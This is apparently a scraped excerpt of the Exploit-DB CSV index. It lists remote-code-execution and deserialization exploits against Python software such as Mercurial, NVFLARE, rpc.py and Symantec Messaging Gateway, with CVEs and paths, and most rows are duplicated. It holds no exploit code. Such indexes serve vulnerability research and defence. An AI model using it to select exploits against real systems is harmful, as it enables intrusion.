41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb 41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
51051,exploits/python/remote/51051.txt,"NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle",2023-03-25,"Elias Hohl",remote,python,,2023-03-25,2023-03-25,0,CVE-2022-34668,,,,, 51051,exploits/python/remote/51051.txt,"NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle",2023-03-25,"Elias Hohl",remote,python,,2023-03-25,2023-03-25,0,CVE-2022-34668,,,,,
46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80,2019-04-03,2021-02-05,0,,,,,http://www.exploit-db.comRelease5.2.3BizunoLib3.1.7.tar.gz, 46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80,2019-04-03,2021-02-05,0,,,,,http://www.exploit-db.comRelease5.2.3BizunoLib3.1.7.tar.gz,
52205,exploits/python/remote/52205.py,"Pymatgen 2024.1 - Remote Code Execution (RCE)",2025-04-15,"Mohammed Idrees Banyamer",remote,python,,2025-04-15,2025-04-15,0,CVE-2024-23346,,,,,
50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",2022-05-11,"Momen Eldawakhly",remote,python,,2022-05-11,2022-05-11,0,CVE-2022-30286,,,,, 50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",2022-05-11,"Momen Eldawakhly",remote,python,,2022-05-11,2022-05-11,0,CVE-2022-30286,,,,,
50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",2022-07-29,"Elias Hohl",remote,python,,2022-07-29,2022-07-29,0,CVE-2022-35411,,,,, 50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",2022-07-29,"Elias Hohl",remote,python,,2022-07-29,2022-07-29,0,CVE-2022-35411,,,,,
42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443,2017-06-26,2017-06-26,1,CVE-2017-6326,"Metasploit Framework (MSF)",,,, 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443,2017-06-26,2017-06-26,1,CVE-2017-6326,"Metasploit Framework (MSF)",,,,

Can't render this file because it is too large.